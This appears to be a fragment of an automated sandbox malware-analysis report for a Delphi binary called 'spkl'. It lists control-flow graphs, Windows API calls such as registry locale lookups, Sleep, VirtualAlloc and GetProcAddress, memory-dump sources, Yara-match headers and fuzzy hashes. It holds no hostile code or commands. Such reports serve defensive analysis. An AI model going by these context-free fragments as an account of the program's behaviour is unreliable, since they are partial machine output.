                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,0040AAE1,?,00000000), ref: 0040A951
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00000000,0040AAE1,?,00000000), ref: 0040A97E
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,0040AAE1), ref: 0040A99C
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040A9BA
                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040A9D8
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AAC4,?,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales), ref: 0040AA18
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AAC4,?,80000001), ref: 0040AA43
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,0040AB98,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AAC4,?,80000001), ref: 0040AA67
                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,0040AB98,00000000,00000000,?,?,?,0040AB98,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0040AA90
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,0040AACB,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AAC4,?,80000001,Software\CodeGear\Locales), ref: 0040AABE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                                                                                                                                                                            • API String ID: 3482678030-345420546
                                                                                                                                                                                                                                                            • Opcode ID: 7686037f220fb291434b12021684ca3a9d7a2f0a43b6e3ea7526b31b9d2f4114
                                                                                                                                                                                                                                                            • Instruction ID: f6036664f45c3f7286cd2f27c23185f6ba116a880561e7131eb2050cadb9a691
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7686037f220fb291434b12021684ca3a9d7a2f0a43b6e3ea7526b31b9d2f4114
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0510371B40308BEEB10EAA5CD46FAE77BCEB08704F504477B604F61C1D6B9AA50DB5A

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 221 403190-40319f 222 4031a5-4031a9 221->222 223 403288-40328b 221->223 224 4031ab-4031b2 222->224 225 40320c-403215 222->225 226 403291-40329b 223->226 227 403378-40337c 223->227 228 4031e0-4031e2 224->228 229 4031b4-4031bf 224->229 225->224 234 403217-403220 225->234 230 40324c-403259 226->230 231 40329d-4032a9 226->231 232 403382-403387 227->232 233 402c1c-402c41 call 402b70 227->233 240 4031e4-4031f5 228->240 241 4031f7 228->241 236 4031c1-4031c6 229->236 237 4031c8-4031dd 229->237 230->231 243 40325b-403264 230->243 238 4032e0-4032ee 231->238 239 4032ab-4032ae 231->239 250 402c43-402c52 VirtualFree 233->250 251 402c5d-402c64 233->251 234->225 242 403222-403236 Sleep 234->242 245 4032b2-4032b6 238->245 247 4032f0-4032f5 call 4029ec 238->247 239->245 240->241 246 4031fa-403207 240->246 241->246 242->224 248 40323c-403247 Sleep 242->248 243->230 249 403266-40327a Sleep 243->249 252 4032f8-403305 245->252 253 4032b8-4032be 245->253 246->226 247->245 248->225 249->231 255 40327c-403283 Sleep 249->255 256 402c54-402c56 250->256 257 402c58-402c5b 250->257 260 402c66-402c82 VirtualQuery VirtualFree 251->260 252->253 262 403307-40330e call 4029ec 252->262 258 403310-40331a 253->258 259 4032c0-4032de call 402a2c 253->259 255->230 265 402c97-402c99 256->265 257->265 263 403348-403375 call 402a8c 258->263 264 40331c-403344 VirtualFree 258->264 267 402c84-402c87 260->267 268 402c89-402c8f 260->268 262->253 274 402c9b-402cab 265->274 275 402cae-402cbe 265->275 267->265 268->265 273 402c91-402c95 268->273 273->260 274->275
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?), ref: 00403226
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?), ref: 00403240
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: fdb00ec2100902d794fb1cbc3425dcf34a78a7217ddd200d769621c9536ef4d7
                                                                                                                                                                                                                                                            • Instruction ID: bbdc09685489627ed5b39331dc89ee397961f4a8db56afddfdf96e3286142ac2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdb00ec2100902d794fb1cbc3425dcf34a78a7217ddd200d769621c9536ef4d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA7105712043508FE711CF298E89B16BFD8AF85315F1482BFE848AB3D6D6B8C945CB59

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 277 33d624c-33d6298 call 33d6228 GetProcAddress 281 33d629e-33d62a5 277->281 282 33d6378-33d6395 277->282 284 33d62ab-33d62b8 281->284 285 33d6333-33d636e 281->285 289 33d62de-33d62e2 284->289 290 33d62ba-33d62dd 284->290 285->282 289->282 292 33d62e8-33d6331 289->292 290->289 292->282
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 033D628F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: could not be located in the dynamic link library $KERNEL32.DLL$LOADER ERROR$The ordinal $The procedure entry point
                                                                                                                                                                                                                                                            • API String ID: 190572456-2170670254
                                                                                                                                                                                                                                                            • Opcode ID: b9060d736ba658fa824bec120a7de8e5542ee93a3bad37e0318ddba35bae45c3
                                                                                                                                                                                                                                                            • Instruction ID: fa83784f31fb58eca5cd3f6d4f64786e82e16ad7a5fda76a1a2273af114e3f11
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9060d736ba658fa824bec120a7de8e5542ee93a3bad37e0318ddba35bae45c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38312D79A00709AFDB00EF98DCC2EAEB7F9FF48310F508565E920A7615C774AA518F60

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0087FB5C), ref: 0040A5FA
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(0087FB5C), ref: 0040A67A
                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(0087FB78,00000000,000000AA,0087FB5C,00000000,00000002,0087FB5C,0087FB5C,00000000,0040A6BD,?,?,00000000,00000000,?,0040AED0), ref: 0040A698
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0087FB5C), ref: 0040A6A2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enterlstrcpyn
                                                                                                                                                                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                                                                                                                                                                            • API String ID: 1122274999-3021119265
                                                                                                                                                                                                                                                            • Opcode ID: d61ae319eddf6f4b60b69cee88791db6c14e0c5a944f71a2f4ff1963d7f7d212
                                                                                                                                                                                                                                                            • Instruction ID: 5723f58af9a41ac21a7e675cb0514bd364bd00aae00b971453d55b0790f8d9a3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d61ae319eddf6f4b60b69cee88791db6c14e0c5a944f71a2f4ff1963d7f7d212
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421F2707043006AD611B777CD26A2922A5AB41B08F18483BB280F32D6C9BFCC15822F

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 335 402e0c-402e1e 336 402e24-402e34 335->336 337 40306c-403071 335->337 338 402e36-402e43 336->338 339 402e8c-402e95 336->339 340 403184-403187 337->340 341 403077-403088 337->341 342 402e45-402e52 338->342 343 402e5c-402e68 338->343 339->338 344 402e97-402ea3 339->344 347 402bb8-402bd8 call 402700 340->347 348 40318d-40318f 340->348 345 403030-40303d 341->345 346 40308a-4030a6 341->346 349 402e54-402e58 342->349 350 402e7c-402e89 342->350 351 402ee0-402ee9 343->351 352 402e6a-402e78 343->352 344->338 354 402ea5-402eb1 344->354 345->346 353 40303f-403048 345->353 356 4030b4-4030c3 346->356 357 4030a8-4030b0 346->357 360 402bdd-402be1 347->360 364 402f24-402f2e 351->364 365 402eeb-402ef8 351->365 353->345 358 40304a-40305e Sleep 353->358 354->338 359 402eb3-402ebf 354->359 362 4030c5-4030d9 356->362 363 4030dc-4030e4 356->363 361 403110-403126 357->361 358->346 370 403060-403067 Sleep 358->370 359->339 371 402ec1-402ed1 Sleep 359->371 372 402c13-402c19 360->372 373 402be3-402c10 call 402b70 360->373 368 403128-403136 361->368 369 40313f-40314b 361->369 362->361 374 403100-403102 call 402af8 363->374 375 4030e6-4030fe 363->375 366 402fa0-402fac 364->366 367 402f30-402f5b 364->367 365->364 376 402efa-402f03 365->376 383 402fd4-402fe3 call 402af8 366->383 384 402fae-402fc0 366->384 378 402f74-402f82 367->378 379 402f5d-402f6b 367->379 368->369 380 403138 368->380 381 40316c 369->381 382 40314d-403160 369->382 370->345 371->338 385 402ed7-402ede Sleep 371->385 373->372 387 403107-40310f 374->387 375->387 376->365 388 402f05-402f19 Sleep 376->388 391 402ff0 378->391 392 402f84-402f9e call 402a2c 378->392 379->378 390 402f6d 379->390 380->369 393 403171-403183 381->393 382->393 394 403162-403167 call 402a2c 382->394 399 402ff5-40302e 383->399 403 402fe5-402fef 383->403 395 402fc2 384->395 396 402fc4-402fd2 384->396 385->339 388->364 389 402f1b-402f22 Sleep 388->389 389->365 390->378 391->399 392->399 394->393 395->396 396->399
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00402EC3
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 00402ED9
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00402F07
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 00402F1D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: 60d3dac85de659a9c7c0bae1bfec1a805d797ea7c6b6b00d4ef26e0dfc08bfec
                                                                                                                                                                                                                                                            • Instruction ID: dfee491c2d37e5c08d703103af1408169b37cdbe47cbf3463ff51bf6769a6579
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60d3dac85de659a9c7c0bae1bfec1a805d797ea7c6b6b00d4ef26e0dfc08bfec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BC1F2726053618BC725CF2DD988316BBA1BF85311F18827FD449AB3DAC7B8D881CB95

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 406 33a3518-33a355d 407 33a355f 406->407 408 33a3561-33a357f call 33a3410 406->408 407->408 411 33a3581 408->411 412 33a3584-33a358a 408->412 411->412 413 33a358c 412->413 414 33a3591-33a3598 412->414 413->414 415 33a359a-33a35a1 414->415 416 33a35a7-33a35ab 414->416 415->416 417 33a367c-33a3693 416->417 418 33a35b1 call 33a34b8 416->418 420 33a36ab-33a36b2 417->420 421 33a3695-33a3698 417->421 424 33a35b6 418->424 422 33a36fb-33a36ff 420->422 423 33a36b4-33a36c0 call 33a35f8 420->423 421->420 425 33a369a-33a36a9 421->425 427 33a370b-33a3714 call 33a3458 422->427 428 33a3701-33a3704 422->428 434 33a36d8-33a36df 423->434 435 33a36c2-33a36d6 call 33a566c call 33a55ef 423->435 425->420 436 33a371b-33a3720 427->436 437 33a3716-33a3719 427->437 428->427 430 33a3706-33a3708 428->430 430->427 439 33a36e1-33a36ef MessageBoxA 434->439 440 33a36f4-33a36f6 434->440 435->440 441 33a3738-33a3741 call 33a3430 436->441 442 33a3722-33a3730 call 33a4fb0 436->442 437->436 437->441 439->440 440->422 451 33a3743 441->451 452 33a3746-33a374a 441->452 442->441 450 33a3732-33a3733 FreeLibrary 442->450 450->441 451->452 453 33a374c call 33a3648 452->453 454 33a3751-33a3754 452->454 453->454 455 33a375e-33a376d 454->455 456 33a3756-33a3759 ExitProcess 454->456 455->422
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Runtime error at 00000000
                                                                                                                                                                                                                                                            • API String ID: 0-1393363852
                                                                                                                                                                                                                                                            • Opcode ID: c86064fae8a0d8ee041fc960ee07ef452a73b57f1aae0d05eb9150e5917a0470
                                                                                                                                                                                                                                                            • Instruction ID: d32bdbedac89daea687dc513af4076f8d36c803a8aa8301e083e21bba7624f97
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c86064fae8a0d8ee041fc960ee07ef452a73b57f1aae0d05eb9150e5917a0470
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B24189BCD00B44AFDB65EF2CD8C4B5ABBA8EB45721F188099E8044F299C778C884CF11

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 491 7b16a4-7b16d1 492 7b17bf-7b17c3 491->492 493 7b17c9-7b17d6 492->493 494 7b16d6-7b16de 492->494 495 7b1718-7b171c 494->495 496 7b16e0-7b16f4 call 40d8c4 494->496 497 7b177e-7b1791 495->497 498 7b171e-7b1741 RtlEnterCriticalSection call 43eba0 call 40b100 495->498 503 7b16fc-7b1712 call 40d9dc call 40d528 496->503 504 7b16f6-7b16fa 496->504 497->493 508 7b1793-7b179a 497->508 509 7b1746-7b17fb call 409078 RtlLeaveCriticalSection SendMessageW call 406568 498->509 503->495 519 7b1714 503->519 504->495 511 7b179c-7b17b0 call 40e338 508->511 512 7b17b5-7b17ba Sleep 508->512 511->512 512->492 519->495
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(00883E10), ref: 007B1723
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(00883E10), ref: 007B1758
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007B176A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_401000_spkl.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeaveMessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 417868457-0
                                                                                                                                                                                                                                                            • Opcode ID: 9c23c4270a22d343c1630606604c065f27a3af641e7f425ae807b8471eca6c14
                                                                                                                                                                                                                                                            • Instruction ID: 2b5719dc66f3b9fb5d8c81c04123e9fde0138808427e2b248b1d477ac1de0d38
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c23c4270a22d343c1630606604c065f27a3af641e7f425ae807b8471eca6c14
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94311570A04344AED721DBBACC52FAEBBE8EB09714F90847AF945E76C1CA7C9904C754

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 522 33aafa4-33aafd2 GetThreadLocale 523 33aafd6-33aafd9 522->523 524 33aafd4 522->524 525 33aafdb-33aafec 523->525 526 33aaff0-33ab010 GetSystemMetrics * 2 523->526 524->523 525->526 527 33ab052-33ab059 526->527 528 33ab012-33ab01c GetCPInfo 526->528 529 33ab043-33ab046 528->529 529->527 530 33ab048-33ab050 529->530 530->527 531 33ab01e-33ab028 530->531 532 33ab02a-33ab02b 531->532 533 33ab040 531->533 534 33ab02e-33ab03e 532->534 533->529 534->533 534->534
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 033AAFCB
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 033AAFF2
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000002A), ref: 033AB001
                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,?,0000002A,0000004A), ref: 033AB015
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MetricsSystem$InfoLocaleThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1011932403-0
                                                                                                                                                                                                                                                            • Opcode ID: 34879e1007579ab41fb02787ff02ab7244ccdfb720af01d3bab063aa60a47653
                                                                                                                                                                                                                                                            • Instruction ID: 804b9c069538df3408bc37060afa76e70458394d20ef1580713110ebc1b1806b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34879e1007579ab41fb02787ff02ab7244ccdfb720af01d3bab063aa60a47653
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB113D0AA59F8549C721FB7D5C412FAFBD8DF52210F0DC468DCE94B682E729D501E362

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 535 33d68c0-33d68cb 536 33d68cd 535->536 537 33d68d5-33d6900 535->537 536->537 540 33d6906-33d6922 call 33d55b0 537->540 541 33d69a1-33d69a5 537->541 548 33d6924-33d692e 540->548 549 33d6930-33d6948 GetProcessAffinityMask 540->549 542 33d69a7-33d69b3 541->542 543 33d69b6-33d69be 541->543 542->543 552 33d6965-33d6979 548->552 549->552 553 33d694a-33d6953 549->553 552->541 557 33d697b-33d698f 552->557 553->552 554 33d6955-33d695d 553->554 554->552 557->541 560 33d6991-33d6999 557->560 560->541
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 033D693E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33c0000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AffinityMaskProcess
                                                                                                                                                                                                                                                            • String ID: 99$kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 1682748466-4043654467
                                                                                                                                                                                                                                                            • Opcode ID: 054aac4a277c4fc9a695592c2af48459e74f2940f97ac9df4c3af449a4bcb0c5
                                                                                                                                                                                                                                                            • Instruction ID: d3650a8e34c433fd16cb4dfc9b551799b06f04d3727a99cea62d7bf51ae02b8b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 054aac4a277c4fc9a695592c2af48459e74f2940f97ac9df4c3af449a4bcb0c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE21EF37E04B149BC720EBBC9CC268AB7A4AB41230B090B61E474DB6C1EB32995047A1

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 561 33fe001-33fe067 call 33fe647 565 33fe06d-33fe108 VirtualAlloc call 33fe651 VirtualFree 561->565 566 33fe5ab-33fe5c2 561->566 565->566 567 33fe5cc-33fe5d1 566->567 568 33fe5c4-33fe5c9 566->568
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000546,00001000,00000004), ref: 033FE0C4
                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000), ref: 033FE0FB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, Offset: 033FE000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33fe000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                            • String ID: D)D
                                                                                                                                                                                                                                                            • API String ID: 2087232378-3173377644
                                                                                                                                                                                                                                                            • Opcode ID: bd922ba1346b31a881822dbc988c0b7e0ff9dd497c26c97527688df2700671f9
                                                                                                                                                                                                                                                            • Instruction ID: 91ab05b29457f0c91792678841e29c43e2b41859d6bb2ac44d14d512d71b98b1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd922ba1346b31a881822dbc988c0b7e0ff9dd497c26c97527688df2700671f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34210BB264028CEFDF51DF60CD85BDE37A8AB48752F800116BE0D9F244D6F567048B1A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(033E8430), ref: 033A201B
                                                                                                                                                                                                                                                              • Part of subcall function 033A1904: LocalAlloc.KERNEL32(00000000,00000FF8,033E8430,033E8430,00000000,033A19BA), ref: 033A1957
                                                                                                                                                                                                                                                              • Part of subcall function 033A1904: RtlLeaveCriticalSection.NTDLL(033E8430), ref: 033A19B4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$AllocEnterLeaveLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 716609888-0
                                                                                                                                                                                                                                                            • Opcode ID: 3705ea7a436e8a1f6ea954c5704e9212112cdfccef3bab6b387af68fb6f369ba
                                                                                                                                                                                                                                                            • Instruction ID: af20f4e12d9ee4332a854cbbfa52030f571132432df7c79ceb4e46ce1329dda1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3705ea7a436e8a1f6ea954c5704e9212112cdfccef3bab6b387af68fb6f369ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20419FB7E04B049FD725EF6CD8C066AB7A9FB48718F198AA9D405CF785D3389881CB00
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,033E8430,033E8430,00000000,033A19BA), ref: 033A1957
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(033E8430), ref: 033A19B4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A1000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33a1000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocCriticalLeaveLocalSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1361736381-0
                                                                                                                                                                                                                                                            • Opcode ID: 78d2dae866ef3d506726cbb906f80eda12415b389198f16ef766dd3fa52ba9bd
                                                                                                                                                                                                                                                            • Instruction ID: 670b33046589e8ca332b64aa3c10e7139f87145e7b80b5af9dc1cc3f2cc73fcf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78d2dae866ef3d506726cbb906f80eda12415b389198f16ef766dd3fa52ba9bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01D279E5CB205ED322FBAC94C47193B88D709F04F898528E151DF2C4C67984C0CF61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 033FE343
                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,?), ref: 033FE3DF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000033.00000002.3234185421.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, Offset: 033FE000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_51_2_33fe000_spkl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2087232378-0
